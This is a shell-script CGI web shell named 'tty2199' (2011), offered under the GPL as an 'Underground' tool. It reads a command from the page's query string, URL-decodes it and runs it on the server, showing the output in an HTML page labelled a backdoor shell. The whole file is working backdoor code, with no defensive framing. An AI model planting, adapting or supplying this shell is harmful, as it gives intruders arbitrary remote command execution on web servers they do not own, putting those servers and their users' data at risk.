#!/bin/sh## tty2199 CGI-Shell Client## Copyright 2011 B4r4k47 [Barakat] <b4r4k47[at]hotmail[dot]com>## This tool is available for free under the GNU General Public License V3 (GPL).# To read the full license, please visit: http://www.gnu.org/licenses/lgpl.html# I hope you find it useful.##cat << EFOContent-type: text/html<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="robots" content="index,follow,noodp,noydir" />tty2199<title>tty2199</title><style type="text/css"><!--body,td,th { color: #0CF;}body { background-color: #000;}.base-lyout { background-color: #000; margin-right: auto; margin-left: auto; width: 900px; padding: 5px; margin-top: 5px;}.base-lyout .useful-commands { font-size: small; text-align: center;}.base-lyout .bottom { font-size: small; text-align: center;}.base-lyout .output { //background-color: #9CF; margin: 10px; padding: 5px; font-weight: bold; //color: #000;}.base-lyout .backdoor-shell { text-align: center; color: #000;}a:link { color: #0CF; text-decoration: none;}a:visited { color: #0CF; text-decoration: none;}a:hover { color: #0CF; text-decoration: none;}a:active { color: #0CF; text-decoration: none;}--></style><div class="base-lyout"> <div class="title"> <hr />EFOIMG="data:image/gif;base64,R0lGODlhuwAkAKU7AAAAAAACAwEEBAEFBgEHCAIKCwMN\DgMQEgQREwUXGgYaHQYcHwYdIQcfIgglKQkmKgkpLgorLwouMw5ARxFKUhFMVBJPVxJQWRN\SWhNVXhZfaRdkbhhrdxluehpxfRt0gBx8iR6DkR+GlCCKmSCNnSGPniGSoiKVpSOYqCScrS\SeryWfsCWhsiWitCanuSeouiiuwSiwwymxxCm0yCq2ySq3yyu5zCu80Cy90S2+0i6/0////\////////////////yH+EUNyZWF0ZWQgd2l0aCBHSU1QACwAAAAAuwAkAAAG/kCAcEgsGo/I\pHLJbDqf0Kh0Sq1ar9isdsvter/gsHhMLpvP6LR6zW673/C4fE6v2+/4vH4f1vl1DXxGf4SF\hoc6Q4iLi4p/gVAzfxFCjJY2Kh4JRISQAAIWJzCWhTEoGgZFoKKkhKaoSq2tjrKMtIBRkn6U\ALWLOBO3kAQpvoYwB0PExoXIScyIt9B/wrmTldOENwrYfpAe2X8gQ+DhOuNI5tTd5tWR173q\OhfskC3qLkP35vlID/8AAz4gNEGgwCEGBRJMCNDdE106eHXpJCTHn4IMExYaYtEPxowKCVGh\eIXkkoUgDdaAN/ERu48p/218GTPgTCkmq+RMIkPe/oIhDTqskNGRWYV6QiCGG6I020iXJaEuG\aGOxhAIN9Q5QArAhLwhXtU99YZlJxIGTY3lCCakhLoP7iRkbSdErtgpZnFKXXIgQ4gTLFoIHk\yYMAsUIjb8HNIzmwsMARw6+MCiMTQikys7xbt3LK40KGs+YDBgUGcpFEReSb1OL9mor6sMoEC\bQoEmoUUHRMBVN0AIGUTgUA3A9z/gwolHybv8dJQDhBaflKeBq7wX0qZh5xxbp3Mo0P9Ij0Xd\ujoO2aGh5/7ZCvMn4f2Mf1Y+3mt1JCKzm5bfsyfv3U0Rnw7zpVMfSdnAUAJb6cmiIIOCRCjhh\BRWaOGFGGao4YYcEnbo4YcghijiiCSWaOKJKMYRBAA7"echo " <img src='$IMG' width='187' height='36' alt='tty2199' /> <hr />"COMMAND=$(echo $QUERY_STRING | sed s/command=//g)COMMAND=$(echo $COMMAND |\sed\ -e s/%20/' '/g\ -e s/+/' '/g\ -e s/%21/'!'/g\ -e s/%22/'"'/g\ -e s/%23/'#'/g\ -e s/%24/'$'/g\ -e s/%25/'%'/g\ -e s/%26/'\&'/g\ -e s/%27/"'"/g\ -e s/%28/'('/g\ -e s/%29/')'/g\ -e s/%2A/'*'/g\ -e s/%2B/'+'/g\ -e s/%2C/','/g\ -e s/%2D/'-'/g\ -e s/%2E/'.'/g\ -e s-%2F-'/'-g\ -e s/%3A/':'/g\ -e s/%3B/';'/g\ -e s/%3C/'<'/g\ -e s/%3D/'='/g\ -e s/%3E/'>'/g\ -e s/%3F/'?'/g\ -e s/%40/'@'/g\ -e s/%5B/'['/g\ -e s-%5C-'\\'-g\ -e s/%5D/']'/g\ -e s/%5E/'^'/g\ -e s/%5F/'_'/g\ -e s/%60/'`'/g\ -e s/%7B/'{'/g\ -e s/%7C/'|'/g\ -e s/%7D/'}'/g\ -e s/%7E/'~'/g)cat << EFO <div class="backdoor-shell">
EFOecho "

<code>[`whoami`@`basename $PWD`]$</code>

"cat << EFO
</div><hr /> <div class="output"> <pre>EFO$COMMAND || echo "Error: $COMMAND: command not found"cat << EFO</pre> </div> <div class="bottom"> <hr /> Under GPL Licene &copy; 2011 B4r4k47<br /> Underground &trade; </div></div>EFO# End OF tty2199